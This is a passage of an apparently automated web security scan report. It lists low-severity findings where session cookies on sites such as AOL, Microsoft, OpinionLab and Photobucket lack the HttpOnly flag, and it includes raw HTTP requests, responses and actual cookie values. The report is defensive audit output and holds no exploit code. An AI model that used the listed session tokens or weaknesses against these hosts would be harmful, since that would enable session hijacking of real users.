http://www.newsvine.com/_action/user/startTracking
http://www.newsvine.com/_action/user/stopTracking
http://www.newsvine.com/_api/comments/getComments
http://www.newsvine.com/_api/question/getUserData
http://www.newsvine.com/_api/user/convTracker
http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts
http://www.newsvine.com/_nv/api/accounts/login
http://www.newsvine.com/_tools/user/login
http://www.newsvine.com/_vine/js/m1/global.js
https://www.newsvine.com/
https://www.newsvine.com/_action/user/logout
https://www.newsvine.com/_nv/accounts/global/information
https://www.newsvine.com/_nv/accounts/login
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts
https://www.newsvine.com/_nv/accounts/msnbc/newsletters
https://www.newsvine.com/_nv/accounts/register
https://www.newsvine.com/_nv/api/accounts/login
https://www.newsvine.com/_nv/api/accounts/resetPassword
http://www.omniture.com/
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.reimage.com/track_new/track.php
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.theworkbuzz.com/employment-trends/video-interviews/
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/
http://www.tigerdirect.com/cgi-bin/icart.asp
http://www.tigerdirect.com/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp
http://www.tigerdirect.com/secure/captcha/Default.aspx
http://www.youtube.com/embed/CKZzn00w01M
http://www.youtube.com/embed/mm8byzo8zWE

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

17.1. http://advertising.aol.com/privacy/advertisingcom/opt-out previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://advertising.aol.com
Path:	/privacy/advertisingcom/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSff329d810a46b3a1bf645141daed34cf=985ce46f8c25697973bf76c1fb01cf21; expires=Tue, 22 Feb 2011 05:38:40 GMT; path=/; domain=.advertising.aol.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=985ce46f8c25697973bf76c1fb01cf21; expires=Tue, 22 Feb 2011 05:38:40 GMT; path=/; domain=.advertising.aol.com
Last-Modified: Sun, 30 Jan 2011 01:56:38 GMT
ETag: "a2c20d0db593eb30d87922af962f68db"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Keep-Alive: timeout=15, max=77
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 31687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

17.2. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; domain=microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=v5Wrg5hY0G1ZKTq92W9PB2I2dXUGcRda9bdvn3lRbyw3vtQVr5yKibRJRo344vn/0+gcIZqwCUZupVUxRhccbbSYfclFWlV45y3+IVUoc/VjkW2CxlqI+BKinJOxY8y1lkTlq5kWs6CF3V9Z5Q6o94Ck6jdBc7u2t8CuSL+TAbTnNTyJ3MYpd4KBFZm4Za8S4IvqsfXWsqT1F0ciAHRsLERgadjlrX8XFWgLVhukLjIREUx+k1Tqr+1MZsnlCuY0GyphPKmFlrT72RxmuWrzHhUSFfvfWxUn649vl7e270SMMTDItio1ndIC5dEVOhZe8xd0Qskq/ep2FTBQaRwMNN+kYzj7574EVGUdnNyjc1tSEPiJxjKw8Rj/clSXreouyHXHIrJuzRzX74axWmeyUjTfyMvvqqonr8jGtpMzwOFukpG63L9tBXL/0mSz8FlXS0uSmHuXScgC1XIJcVG8aWoTnKpZPxIXPVGPh63/vmCnYYUJ3Nxe0yHa3BTDjlef5DOBN0JSNIAp3+N0oVL6SUjutOcU+950gT6kex7wcLk=&Microsoft.MicrosoftId=0237-9950-5424-5770; domain=microsoft.com; expires=Mon, 30-Jan-2012 14:50:57 GMT; path=/
MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; domain=.microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.3. https://careers.microsoft.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://careers.microsoft.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionProfile=imfrgsjgkicnzcjt42531kjd; path=/; secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: careers.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.4. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQTCBBDR=KLBDJLOBBPPOPIONDAELIJLO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14859
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQTCBBDR=KLBDJLOBBPPOPIONDAELIJLO; path=/
Date: Sat, 29 Jan 2011 23:45:32 GMT
Connection: close

<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<title>Comment Card</title><script language="javascript" type="tex
...[SNIP]...

17.5. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDASTCBBCQ=MBCDJLOBBDKPLCFLGGHFIDII; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDASTCBBCQ=MBCDJLOBBDKPLCFLGGHFIDII; path=/
Date: Sat, 29 Jan 2011 23:45:32 GMT
Connection: close

17.6. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSCDTCACS=FPMEIDMCJOFCBFNMKCBECFLJ; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /o.asp HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSCDTCACS=FPMEIDMCJOFCBFNMKCBECFLJ; path=/
Date: Sun, 30 Jan 2011 16:42:21 GMT
Connection: close

17.7. http://dating.redacted/cp.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dating.redacted
Path:	/cp.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MatchSession=CDTF=1/29/2011&UMID=b696db19-d3c2-4ad4-a071-50a129f87faf; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
SECU=TID=516068; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 29 Jan 2011 23:45:55 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Location: /errors/ErrorPage.aspx?aspxerrorpath=/cp.aspx
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=b696db19-d3c2-4ad4-a071-50a129f87faf; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: SECU=TID=516068; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferrors%2fErrorPage.aspx%3faspxerrorpath%3d%2fcp.aspx">here</a>.</h2>
</body></html>

17.8. http://dating.redacted/en-us/partner/msn/38028.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dating.redacted
Path:	/en-us/partner/msn/38028.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MatchSession=CDTF=1/29/2011&UMID=1d011f98-ba73-4855-b224-c4cf627b237b; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
SECU=TID=516068&ESID=58b22e78-d897-4147-94de-7181130c66ec&THEME=84; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/partner/msn/38028.html HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.9. http://dating.redacted/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dating.redacted
Path:	/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MatchSession=CDTF=1/29/2011&UMID=be2ed4ee-f5a1-4aa4-bb78-4689f6d90efb; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
SECU=TID=516068&ESID=6b75de65-2551-4051-a775-8f526e3162c3&THEME=215; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.10. http://dating.redacted/search/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://dating.redacted
Path:	/search/index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MatchSession=CDTF=1/29/2011&UMID=b2dc8c0f-b300-4020-86ce-39e4f8fd9272; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
SECU=TID=516068&ESID=e6d8d8dd-063a-4700-a8ac-b5738414eb12&THEME=215; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:49 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=b2dc8c0f-b300-4020-86ce-39e4f8fd9272; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=e6d8d8dd-063a-4700-a8ac-b5738414eb12&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head><meta http-equiv=
...[SNIP]...

17.11. http://games.redacted/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://games.redacted
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSGmSession=RUID=d177791d618543afa46923d904b9fd9b&Env=AP2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: games.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.12. http://malexj.tk/6M previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://malexj.tk
Path:	/6M

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=aKD9jFE80awb; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /6M HTTP/1.1
Host: malexj.tk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:09:32 GMT
Server: Resin/2.1.17
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Server: maloofuta.ams.taloha.net
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=aKD9jFE80awb; path=/
Connection: close

<html>
<head>
<title>malexj.tk</title>
<meta name="description" content="malexj.tk">
<meta name="keywords" content="malexj.tk">
</head>
<frameset rows="*" framespacing="0" border="0
...[SNIP]...

17.13. http://msn.chemistry.com/cp/landing/44762 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://msn.chemistry.com
Path:	/cp/landing/44762

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Session=SID=99B544F5-72EC-4453-B766-5821666E8BC4&Th=11&TID=508259; path=/
ETL=MID=d278fc94-dbd7-4a08-8cb6-0a6b0f3e8a2e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
UMID=c7fdb268-bc89-4e0a-b9a5-5a3cbc611c0e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.14. http://msn.chemistry.com/cp/landing/57269 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://msn.chemistry.com
Path:	/cp/landing/57269

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Session=SID=A963DE98-E013-45FE-A22F-7F3E03113FAE&Th=11&TID=508259; path=/
ETL=MID=8529a559-f7f1-4949-aed2-acc51bf1723b; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
UMID=6abfa29e-5c60-42a5-b7be-7db42c89c8cb; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.15. http://msn.foxsports.com/video previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://msn.foxsports.com
Path:	/video

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=72E4F63379582C3093F112CC8DFB1BD7; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 210537
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=72E4F63379582C3093F112CC8DFB1BD7; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=28
Date: Sat, 29 Jan 2011 23:49:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

17.16. http://msn.whitepages.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://msn.whitepages.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnsawQAEcAADI6GyA%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://photobucket.com
Path:	/$\|zone.redacted\|xbox.com\|www.aol.com/$\|http:/Webmail.aol.com/$\|http:/travel.aol.com/$\|http:/netscape.aol.com/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pb_session=ZWI4OWU0ODgwY2E4MTQ5YmIwMjAxODVmN2M3ZGRmMDQkYToyOntzOjQ6InRpbWUiO2k6MTI5NjM1Mzg2NTtzOjQ6InVuaXEiO3M6MjU6IjEyOTYzNTM4NjUuODk0ODE0NTQzMzA1OTYiO30%3D; path=/; domain=.photobucket.com
flash=deleted; expires=Sat, 30-Jan-2010 02:17:44 GMT; path=/; domain=.photobucket.com
pb_userid=MjIyMjQ3YmIxNzA3YTk1ZGY5Y2NiZjNlZWZlYTI1NGEkYToxOntzOjc6InRyYWNraWQiO3M6MjQ6IjEyOTYzNTM4NjUuODk0NDM5MjkzMTkyMiI7fQ%3D%3D; expires=Tue, 19-Jan-2038 03:14:06 GMT; path=/; domain=.photobucket.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: photobucket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 02:17:45 GMT
Server: Apache
Set-Cookie: flash=deleted; expires=Sat, 30-Jan-2010 02:17:44 GMT; path=/; domain=.photobucket.com
Set-Cookie: pb_userid=MjIyMjQ3YmIxNzA3YTk1ZGY5Y2NiZjNlZWZlYTI1NGEkYToxOntzOjc6InRyYWNraWQiO3M6MjQ6IjEyOTYzNTM4NjUuODk0NDM5MjkzMTkyMiI7fQ%3D%3D; expires=Tue, 19-Jan-2038 03:14:06 GMT; path=/; domain=.photobucket.com
Set-Cookie: pb_session=ZWI4OWU0ODgwY2E4MTQ5YmIwMjAxODVmN2M3ZGRmMDQkYToyOntzOjQ6InRpbWUiO2k6MTI5NjM1Mzg2NTtzOjQ6InVuaXEiO3M6MjU6IjEyOTYzNTM4NjUuODk0ODE0NTQzMzA1OTYiO30%3D; path=/; domain=.photobucket.com
Location: http://photobucket.com/findstuff/?httpstatus=404
Content-Length: 0
Connection: close
Content-Type: text/html

17.18. https://secure.opinionlab.com/ccc01/comment_card.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp?time1= HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.19. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.20. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.21. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

session=1296350849|1296350849; path=/; domain=.mookie1.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://travel.aol.com
Path:	/$\|http:/netscape.aol.com/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=24C8300C2A06E9010602B17132ED72CA; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.23. http://trueslant.com/milesobrien/ previous next

Summary

Severity:	Low
